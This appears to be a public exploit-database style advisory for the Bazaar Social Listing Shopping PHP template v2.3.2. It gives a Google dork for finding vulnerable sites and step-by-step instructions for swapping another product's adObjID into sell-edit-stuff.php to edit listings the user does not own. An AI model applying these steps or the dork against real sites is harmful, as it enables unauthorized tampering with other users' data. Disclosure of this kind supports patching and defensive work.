<pre><code>====================================================================================================================================<br />| # Title : Bazaar | Social Listing Shopping Web PHP Template v2.3.2 Privilege Escalation Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913?s_rank=87 | <br />| # Dork : "/ad-info.php?adObjID=" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Create New User Account.<br /><br />[+] Create new stuff to Sell it https://127.0.0.1/www/egyptdrinkscom/sell-edit-stuff.php<br /><br />[+] When you create new stuff they give you id reference : /sell-edit-stuff.php?adObjID=FUFtDfZEny<br /><br />[+] Id reference = FUFtDfZEny<br /><br />[+] Now select any other product's ID and replace it at the end of the variable.<br /><br />[+] " /Sell-edit-stuff.php?adObjID= " Replace it FUFtDfZEny with iSTyt9gIoM<br /><br />[+] https://127.0.0.1/www/egyptdrinkscom/sell-edit-stuff.php?adObjID=iSTyt9gIoM<br /><br />[+] https://www.youtube.com/watch?v=ffBFXgXuuy0<br /><br /><br />====Greetings to :=====================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=======================================================================================================================================<br /></code></pre>